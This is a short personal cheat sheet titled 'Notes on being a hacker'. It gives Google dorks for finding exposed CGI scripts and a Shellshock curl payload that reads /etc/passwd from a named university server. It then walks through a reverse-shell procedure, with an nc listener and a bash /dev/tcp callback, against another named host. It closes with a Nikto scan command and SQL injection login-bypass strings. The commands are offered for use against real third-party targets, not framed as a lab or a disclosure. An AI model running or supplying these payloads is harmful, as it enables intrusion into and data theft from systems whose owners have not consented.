Notes on being a hacker
Finding targets with Google (shell scripts exposed under /cgi-bin/); either dork works on its own:
inurl:cgi-bin filetype:sh site:edu
inurl:/cgi-bin/ ext:sh
Checking the target remotely (Shellshock, CVE-2014-6271): the CGI server copies the User-Agent header into the environment, a vulnerable bash executes the text after the function body, and /etc/passwd comes back in the response.
curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh
Reverse shell
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
If it responds with 'Command sent to the server!', continue as follows.
Start a listener and wait until the PHP command completes; if all goes well, the shell lands here and you can issue commands:
> nc -lp 4444 -vv
Open another terminal and issue the command (replace here.is.my.IP with the address the listener is reachable on):
> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"
Scanning the target with Nikto
cd /pentest/web/nikto
perl nikto.pl -host 123.123.123.123
Checking the login form for SQL injection. Which comment marker works depends on the database (-- and /* on most engines, # on MySQL); the variants starting with ') are for queries that wrap the condition in parentheses.
Username:
admin' --
admin' #
admin'/*
Password:
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--